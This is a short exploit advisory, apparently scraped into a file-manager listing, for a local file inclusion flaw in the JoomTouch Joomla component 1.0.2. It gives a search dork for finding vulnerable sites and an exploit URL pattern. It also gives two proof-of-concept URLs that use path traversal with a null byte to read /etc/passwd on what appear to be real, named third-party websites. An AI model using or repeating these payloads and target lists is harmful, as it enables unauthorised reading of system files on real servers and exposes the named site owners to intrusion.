JoomTouch Joomla Component Local File Inclusion Vulnerability Inveet.id rwxr-xr-x 0 22.50

Filename	JoomTouch Joomla Component Local File Inclusion Vulnerability
Permission	rw-r--r--
Author	Inveet.id
Date and Time	22.50
Label
Action

[-] JoomTouch Joomla Component <= Local File Inclusion Vulnerability

Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Dork : "com_joomtouch"
Author : mydisha


[-] Exploit

http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]

[-] PoC

http://torah5.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00 

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00